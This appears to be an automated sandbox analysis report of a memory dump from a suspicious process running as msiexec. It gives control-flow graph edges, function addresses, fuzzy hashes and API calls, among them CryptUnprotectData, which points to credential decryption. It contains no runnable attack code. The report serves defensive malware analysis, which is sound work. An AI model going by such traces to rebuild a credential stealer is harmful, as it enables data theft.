682->725 683->674 683->680 683->681 683->682 683->684 683->686 683->687 683->688 683->691 683->692 683->695 683->696 684->681 684->682 684->687 685->722 686->680 686->681 686->682 686->684 686->687 686->688 686->691 686->692 686->695 686->696 702 2fef20-2fef44 687->702 688->681 688->682 688->684 688->692 688->696 689->679 689->680 689->681 689->682 689->683 689->684 689->685 689->686 689->687 689->688 689->690 689->691 689->692 689->693 689->694 689->695 689->696 690->680 690->681 690->682 690->683 690->684 690->685 690->686 690->687 690->688 690->691 690->692 690->695 690->696 691->681 691->682 691->684 691->688 691->692 691->696 692->681 692->682 692->688 692->696 693->669 693->674 726 2fee00-2fee07 693->726 696->681 696->682 696->684 696->688 696->692 700 2fea3c-2fea44 697->700 701 2feba9-2febae 697->701 698->698 728 2fec36-2fec3d 698->728 704 2feb40-2feb46 699->704 736 2fea50-2fea57 700->736 701->663 701->664 701->667 702->702 737 2fef46-2fef4d 702->737 704->704 738 2feb48-2feb4f 704->738 705->715 706->707 706->709 706->710 706->711 706->719 706->725 707->709 707->710 707->711 707->719 708->705 708->707 708->709 708->710 708->711 708->712 708->713 708->714 708->715 708->716 708->718 708->719 708->720 708->723 708->724 708->725 709->719 710->709 711->675 712->705 713->707 713->709 713->710 713->711 713->714 713->716 713->718 713->719 713->723 713->724 713->725 731 2ff100-2ff124 714->731 715->707 715->709 715->710 715->711 715->713 715->714 715->716 715->719 715->723 715->724 715->725 716->714 717->705 717->706 717->707 717->709 717->710 717->711 717->712 717->713 717->714 717->715 717->716 717->718 717->719 717->720 717->723 717->724 717->725 718->707 718->709 718->710 718->711 718->714 718->716 718->719 718->723 718->724 718->725 779 2ff218 call 61883c2 719->779 780 2ff218 call 61884f7 719->780 720->712 721->705 721->706 721->707 721->708 721->709 721->710 721->711 721->712 721->713 721->714 721->715 721->716 721->717 721->718 721->719 721->720 721->723 721->724 721->725 723->716 724->705 724->706 724->707 724->708 724->709 724->710 724->711 724->712 724->713 724->714 724->715 724->716 724->717 724->718 724->719 724->720 724->723 724->724 724->725 725->707 725->709 725->710 725->711 725->719 726->681 726->682 729 2fec3f-2fec4b 728->729 730 2fec6c-2fec88 728->730 739 2fec50-2fec57 729->739 730->663 730->664 730->665 730->666 730->667 731->731 740 2ff126-2ff12e 731->740 741 2fea5d-2fea60 736->741 742 2feb79-2feb83 736->742 737->726 743 2fef53-2fef5f 737->743 745 2feb71-2feb74 738->745 746 2feb51-2feb56 738->746 750 2fec59-2fec5c 739->750 751 2fec60-2fec66 739->751 740->724 752 2ff134-2ff13a 740->752 741->736 755 2fea62-2fea66 741->755 742->701 758 2feb85-2feba6 call 319510 742->758 756 2fef60-2fef67 743->756 745->675 757 2feb60-2feb6b 746->757 748 2ff21a-2ff21f 748->675 750->739 759 2fec5e 750->759 751->730 760 2ff243-2ff27e call 319510 751->760 761 2ff140-2ff147 752->761 755->701 762 2fef69-2fef6c 756->762 763 2fef73-2fef79 756->763 757->757 764 2feb6d-2feb6f 757->764 758->701 759->730 766 2ff149-2ff14c 761->766 767 2ff153-2ff159 761->767 762->756 769 2fef6e 762->769 763->726 770 2fef7f-2fefa6 call 319510 763->770 764->745 766->761 773 2ff14e 766->773 767->724 774 2ff15f-2ff190 call 319510 767->774 769->726 770->681 770->682 773->724 774->705 774->706 774->707 774->708 774->709 774->710 774->711 774->712 774->713 774->714 774->715 774->716 774->717 774->718 774->719 774->720 774->723 774->724 774->725 779->748 780->748
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: =:;8$=:;8$FI{{$InA>$iiWU$r/$uyz|
                                                                                                                                                                                                                                • API String ID: 0-248323398
                                                                                                                                                                                                                                • Opcode ID: d7502ca8308407c2580dcac9cba9830b4cf93de3e0ef52f700e95139c984f547
                                                                                                                                                                                                                                • Instruction ID: 5cca550d872657deac42fb9367d23b6752a31da503c5ed8b673bace5aa1ff5cc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7502ca8308407c2580dcac9cba9830b4cf93de3e0ef52f700e95139c984f547
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B422EF75618301CFD729CF28DC9072AB7E6FB89314F0A887CE5858B2A1E735DA12CB41
                                                                                                                                                                                                                                Function 002E8C60 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 240threadCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 817 2e8c60-2e8c6e call 317a80 820 2e8c74-2e8c7b call 310ca0 817->820 821 2e8f31-2e8f33 ExitProcess 817->821 824 2e8f2c call 319410 820->824 825 2e8c81-2e8cb8 GetCurrentThreadId 820->825 824->821 827 2e8cba-2e8cbc 825->827 828 2e8cc1-2e8cc5 825->828 827->828 829 2e8cc9-2e8e1b GetForegroundWindow 828->829 830 2e8cc7 828->830 831 2e8eed-2e8f20 call 2ea030 829->831 832 2e8e21-2e8ecf GetCurrentProcessId 829->832 830->829 831->824 837 2e8f22 call 2ed030 831->837 833 2e8ed5-2e8eeb 832->833 834 2e8ed1-2e8ed3 832->834 833->831 834->833 839 2e8f27 call 2ebc80 837->839 839->824
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess$ExitForegroundThreadWindow
                                                                                                                                                                                                                                • String ID: rXT
                                                                                                                                                                                                                                • API String ID: 3118123366-3474455373
                                                                                                                                                                                                                                • Opcode ID: 27d644386af3ee0469be2f220536f8ccddad42c63f88525c825f32ed9ca1f798
                                                                                                                                                                                                                                • Instruction ID: bb8a552e27ff22234225fde2fcdd10b429d509008e1d97ea076321c30a9aa46a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27d644386af3ee0469be2f220536f8ccddad42c63f88525c825f32ed9ca1f798
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF712973BA47180BC71CADBACC953A9B6D79BC8610F4EC13D9999C7345EEB89C0842C1
                                                                                                                                                                                                                                Function 003087F2 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 461COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 841 3087f2-308853 call 31c130 845 308860-30889a 841->845 845->845 846 30889c-3088a5 845->846 847 3088a7-3088af 846->847 848 3088bb-3088c7 846->848 849 3088b0-3088b9 847->849 850 3088c9-3088cf 848->850 851 3088db-308946 FreeLibrary call 31c130 848->851 849->848 849->849 852 3088d0-3088d9 850->852 857 308950-30897b 851->857 852->851 852->852 857->857 858 30897d-308986 857->858 859 308988-30898f 858->859 860 30899b-3089a7 858->860 861 308990-308999 859->861 862 3089a9-3089af 860->862 863 3089bb-308a11 860->863 861->860 861->861 864 3089b0-3089b9 862->864 866 308a20-308a50 863->866 864->863 864->864 866->866 867 308a52-308a5b 866->867 868 308a7d 867->868 869 308a5d-308a66 867->869 870 308a80-308a8c 868->870 871 308a70-308a79 869->871 873 308aab-308aff 870->873 874 308a8e-308a94 870->874 871->871 872 308a7b 871->872 872->870 877 308b00-308b28 873->877 875 308aa0-308aa9 874->875 875->873 875->875 877->877 878 308b2a-308b33 877->878 879 308b35-308b3b 878->879 880 308b4b-308b57 878->880 881 308b40-308b49 879->881 882 308b59-308b5f 880->882 883 308b6b-308bd6 call 31c130 880->883 881->880 881->881 884 308b60-308b69 882->884 888 308be0-308c1f 883->888 884->883 884->884 888->888 889 308c21-308c2a 888->889 890 308c2c-308c35 889->890 891 308c4d 889->891 892 308c40-308c49 890->892 893 308c50-308c65 891->893 892->892 894 308c4b 892->894 895 308dd9-308e1f 893->895 896 308c6b-308c75 893->896 894->893 898 308e20-308e4b 895->898 897 308c80-308c91 896->897 899 308cb0-308cba 897->899 900 308c93-308c9f 897->900 898->898 901 308e4d-308e58 898->901 903 308ce0-308cef 899->903 904 308cbc-308cbf 899->904 902 308d70-308d76 900->902 905 308e5a 901->905 906 308e6b-308e6e call 30bd40 901->906 911 308d78-308d7e 902->911 907 308cf5-308cf8 903->907 908 308d8a-308d92 903->908 904->903 912 308cc1-308cd3 904->912 909 308e60-308e69 905->909 914 308e73-308e92 906->914 907->908 913 308cfe-308d68 907->913 915 308d94-308d97 908->915 916 308d99-308d9c 908->916 909->906 909->909 911->895 917 308d80-308d82 911->917 918 308cd6-308cd9 912->918 913->902 915->911 919 308dd2-308dd4 916->919 920 308d9e-308dcd 916->920 917->897 921 308d88 917->921 918->902 919->895 919->918 920->918 921->895
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                • String ID: >PFb$yvwA$9Ua
                                                                                                                                                                                                                                • API String ID: 3664257935-121258406
                                                                                                                                                                                                                                • Opcode ID: 5824901ce8605a74371ca0b667cecc239ddaf7cf6288e0c4ae9e51ccd2d6eb6b
                                                                                                                                                                                                                                • Instruction ID: a9daadc5ff8a3e92a93f194369ab5f6b90641ccfb55651199fcff6e143f506f8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5824901ce8605a74371ca0b667cecc239ddaf7cf6288e0c4ae9e51ccd2d6eb6b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CE1A360615B818EE726CF35C4607B3BBE1AF57304F08889DC1EB9B6C2DB796506CB25
                                                                                                                                                                                                                                Function 002EB560 Relevance: 5.5, Strings: 4, Instructions: 496COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 922 2eb560-2eb5e8 923 2eb5f0-2eb5f9 922->923 923->923 924 2eb5fb-2eb60e 923->924 926 2eb8cf-2eb8d6 924->926 927 2eb95f-2eb96b 924->927 928 2eb61c-2eb83f 924->928 929 2eb8db-2eb958 call 2e8490 924->929 930 2eb988 924->930 931 2eb897-2eb8a2 924->931 932 2eb615-2eb617 924->932 933 2eb995-2eb9a1 924->933 934 2eb9e2-2eba07 924->934 935 2eb8b0-2eb8b8 924->935 936 2eb970-2eb981 924->936 937 2eb8c1-2eb8c8 924->937 944 2ebc6a-2ebc73 926->944 948 2ebc5e-2ebc67 927->948 947 2eb840-2eb889 928->947 929->927 929->930 929->933 929->934 929->936 938 2ebabe-2ebac5 929->938 939 2ebacc-2ebad8 929->939 940 2ebadd-2ebb0e 929->940 941 2eba50-2eba75 929->941 930->933 931->935 946 2ebc76-2ebc7d 932->946 942 2eb9b0-2eb9d4 933->942 943 2eba10-2eba2f 934->943 955 2eb8bb 935->955 936->930 936->933 936->934 936->938 936->939 936->940 936->941 937->926 937->927 937->929 937->930 937->933 937->934 937->936 937->938 937->939 937->940 937->941 938->939 938->940 954 2ebc55 939->954 961 2ebc4b-2ebc52 940->961 962 2ebc48 940->962 963 2ebbe4-2ebbe9 940->963 964 2ebb42-2ebb57 940->964 965 2ebc20-2ebc2f call 319430 940->965 966 2ebb5e-2ebb73 940->966 967 2ebbfe-2ebc06 940->967 968 2ebb1b-2ebb27 940->968 969 2ebbdb 940->969 970 2ebbb4-2ebbb7 940->970 971 2ebb15 940->971 972 2ebb75-2ebbad 940->972 973 2ebc32-2ebc3f call 319430 940->973 974 2ebb30-2ebb39 940->974 975 2ebbf0-2ebbf7 940->975 976 2ebc10 940->976 951 2eba80-2ebaa0 941->951 942->942 949 2eb9d6-2eb9d9 942->949 943->943 950 2eba31-2eba47 943->950 944->946 947->947 952 2eb88b-2eb88e 947->952 948->944 949->934 950->941 951->951 958 2ebaa2-2ebab8 951->958 952->931 954->948 955->937 958->938 961->954 962->961 963->962 963->970 963->975 964->961 964->962 964->963 964->965 964->966 964->967 964->969 964->970 964->972 964->973 964->975 964->976 965->973 978 2ebbba-2ebbd4 966->978 967->976 968->974 969->963 970->978 971->968 972->962 972->970 973->962 974->964 975->962 975->963 975->967 975->970 975->972 975->976 978->962 978->963 978->965 978->967 978->969 978->970 978->972 978->973 978->975 978->976
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: HiRk$gQlS$gU`W$i]m_
                                                                                                                                                                                                                                • API String ID: 0-1269447593
                                                                                                                                                                                                                                • Opcode ID: 567d483f10622ce8991a5f1686accd18a6d629f7fb8860830e86e1889b66a16b
                                                                                                                                                                                                                                • Instruction ID: 04c3feba9a6a1e02f5a568c2f266893ca627840c27744941c4702454bc6fcc0d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 567d483f10622ce8991a5f1686accd18a6d629f7fb8860830e86e1889b66a16b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F80244B1211B40CFE3358F25D891B97BBF5FB49314F158A2CE5A78BA90CB75A409CB90
                                                                                                                                                                                                                                Function 003087E9 Relevance: 4.2, Strings: 3, Instructions: 481COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 996 3087e9-308946 call 31c130 1001 308950-30897b 996->1001 1001->1001 1002 30897d-308986 1001->1002 1003 308988-30898f 1002->1003 1004 30899b-3089a7 1002->1004 1005 308990-308999 1003->1005 1006 3089a9-3089af 1004->1006 1007 3089bb-308a11 1004->1007 1005->1004 1005->1005 1008 3089b0-3089b9 1006->1008 1010 308a20-308a50 1007->1010 1008->1007 1008->1008 1010->1010 1011 308a52-308a5b 1010->1011 1012 308a7d 1011->1012 1013 308a5d-308a66 1011->1013 1014 308a80-308a8c 1012->1014 1015 308a70-308a79 1013->1015 1017 308aab-308aff 1014->1017 1018 308a8e-308a94 1014->1018 1015->1015 1016 308a7b 1015->1016 1016->1014 1021 308b00-308b28 1017->1021 1019 308aa0-308aa9 1018->1019 1019->1017 1019->1019 1021->1021 1022 308b2a-308b33 1021->1022 1023 308b35-308b3b 1022->1023 1024 308b4b-308b57 1022->1024 1025 308b40-308b49 1023->1025 1026 308b59-308b5f 1024->1026 1027 308b6b-308bd6 call 31c130 1024->1027 1025->1024 1025->1025 1028 308b60-308b69 1026->1028 1032 308be0-308c1f 1027->1032 1028->1027 1028->1028 1032->1032 1033 308c21-308c2a 1032->1033 1034 308c2c-308c35 1033->1034 1035 308c4d 1033->1035 1036 308c40-308c49 1034->1036 1037 308c50-308c65 1035->1037 1036->1036 1038 308c4b 1036->1038 1039 308dd9-308e1f 1037->1039 1040 308c6b-308c75 1037->1040 1038->1037 1042 308e20-308e4b 1039->1042 1041 308c80-308c91 1040->1041 1043 308cb0-308cba 1041->1043 1044 308c93-308c9f 1041->1044 1042->1042 1045 308e4d-308e58 1042->1045 1047 308ce0-308cef 1043->1047 1048 308cbc-308cbf 1043->1048 1046 308d70-308d76 1044->1046 1049 308e5a 1045->1049 1050 308e6b-308e6e call 30bd40 1045->1050 1055 308d78-308d7e 1046->1055 1051 308cf5-308cf8 1047->1051 1052 308d8a-308d92 1047->1052 1048->1047 1056 308cc1-308cd3 1048->1056 1053 308e60-308e69 1049->1053 1058 308e73-308e92 1050->1058 1051->1052 1057 308cfe-308d68 1051->1057 1059 308d94-308d97 1052->1059 1060 308d99-308d9c 1052->1060 1053->1050 1053->1053 1055->1039 1061 308d80-308d82 1055->1061 1062 308cd6-308cd9 1056->1062 1057->1046 1059->1055 1063 308dd2-308dd4 1060->1063 1064 308d9e-308dcd 1060->1064 1061->1041 1065 308d88 1061->1065 1062->1046 1063->1039 1063->1062 1064->1062 1065->1039
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: >PFb$yvwA$9Ua
                                                                                                                                                                                                                                • API String ID: 0-121258406
                                                                                                                                                                                                                                • Opcode ID: 28d913b23d1f091c5a6fb858c55460a34e0b74435b894e96c866446e92d2aaf0
                                                                                                                                                                                                                                • Instruction ID: 46af09be7371c7f55c6cb27ac5a05ad751456771513fed05e9ea64f85f9ad5e1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28d913b23d1f091c5a6fb858c55460a34e0b74435b894e96c866446e92d2aaf0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BE1D870615B418FE726CF35C4A17A3BBE1AF56314F08896DC0EA8B7C2DB39A505CB61
                                                                                                                                                                                                                                Function 00313870 Relevance: 4.0, Strings: 3, Instructions: 257COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: )$*$+
                                                                                                                                                                                                                                • API String ID: 0-1294817745
                                                                                                                                                                                                                                • Opcode ID: 221f43c9300587713883b289a5d4e6fb26d59f628a49b228af651ab72b21585e
                                                                                                                                                                                                                                • Instruction ID: 24b2a9ab03822b12f31bdaef37b8896085259c64b92f025832d02b4f4dc8381c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 221f43c9300587713883b289a5d4e6fb26d59f628a49b228af651ab72b21585e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3A1F670908284CFDB16CF7CC4853EDBFE5AB0A320F19895AD4959B386D3358A89CB52
                                                                                                                                                                                                                                Function 002FD190 Relevance: 2.6, Strings: 2, Instructions: 107COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: (S Q$[Y
                                                                                                                                                                                                                                • API String ID: 0-3290677499
                                                                                                                                                                                                                                • Opcode ID: 7a7a65401f80fe6cd0b656ebf93774012db55ebd7fc688ddb880b61c058d13ac
                                                                                                                                                                                                                                • Instruction ID: 2c99e27b6e666627541890f2ef54f05c35318a0ecb266ffd359e5b845258d33b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7a65401f80fe6cd0b656ebf93774012db55ebd7fc688ddb880b61c058d13ac
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 233134B18153098BD310DF24C881677F7B6EF92760F44852CF9988B291E778DD05D7A2
                                                                                                                                                                                                                                Function 002F3DD8 Relevance: 1.6, APIs: 1, Instructions: 150encryptionCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 002F3EA9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 834300711-0
                                                                                                                                                                                                                                • Opcode ID: 1de1f07f9435317bfd4828cd2c886ffe5e950c0bacbef558f295b5acc13c0e9f
                                                                                                                                                                                                                                • Instruction ID: 3800b44608ba1bab1e3db72d4860da9f5e6a0c6997ebce1b7d2099b0526af527
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1de1f07f9435317bfd4828cd2c886ffe5e950c0bacbef558f295b5acc13c0e9f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2751F3B19182429FD724CF28C49177FBBE5AF94344F154A3CE2D987242E731D955CB82
                                                                                                                                                                                                                                Function 00319510 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LdrInitializeThunk.NTDLL(0031CBA8,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0031953E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
